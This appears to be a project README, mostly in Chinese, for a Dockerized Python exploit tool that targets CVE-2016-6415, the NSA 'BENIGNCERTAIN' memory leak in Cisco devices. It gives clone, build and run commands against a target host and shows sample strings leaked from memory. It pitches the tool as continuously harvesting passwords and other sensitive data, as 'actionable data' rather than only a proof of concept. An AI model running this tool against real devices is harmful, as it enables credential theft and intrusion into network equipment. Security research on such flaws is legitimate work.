
Re-implementation of VirtueSecurity's benigncertain-monitor
对 VirtueSecurity 的 benigncertain-monitor 的重新实现。与原版相比,虽然不支持所有相同的有效载荷选项,但用 Ross Bradley 提供的一个更好的概念验证替换了有问题的 bc-id 二进制文件,此概念验证在必要时可以进一步扩展。
$ git clone https://github.com/3ndG4me/CVE-2016-6415-BenignCertain-Monitor.git
$ cd CVE-2016-6415-BenignCertain-Monitor
$ sudo docker build . -t benign-monitor
$ sudo docker run -it benign-monitor <host>
该服务将持续轮询易受攻击的服务,从内存中提取 ASCII 字符串,将字符串存储在本地 sqlite 数据库中,并显示最常出现的字符串:
Starting monitor against 10.0.6.1
string count
0 5$dx 3
1 0(0 3
2 $c{l 3
3 (0"t&j 3
4 R$dkd$hf7! 2
5 %d1N=8$i- 2
6 $c)P0 1
7 1NlD 1
8 1NlD' 1
9 $c)P(0 1
10 $c)P1@_ 1
这是一个 Docker 化的 Python 脚本,能够持续泄漏目标(易受 NSA BENIGNCERTAIN Cisco 漏洞 CVE-2016-6415 影响)的内存。
该脚本在一段时间内轮询易受攻击的服务,以识别可能的密码和其他潜在敏感信息。它可用于在一段时间内收集可操作的数据,而不仅仅是作为一个概念验证性利用工具。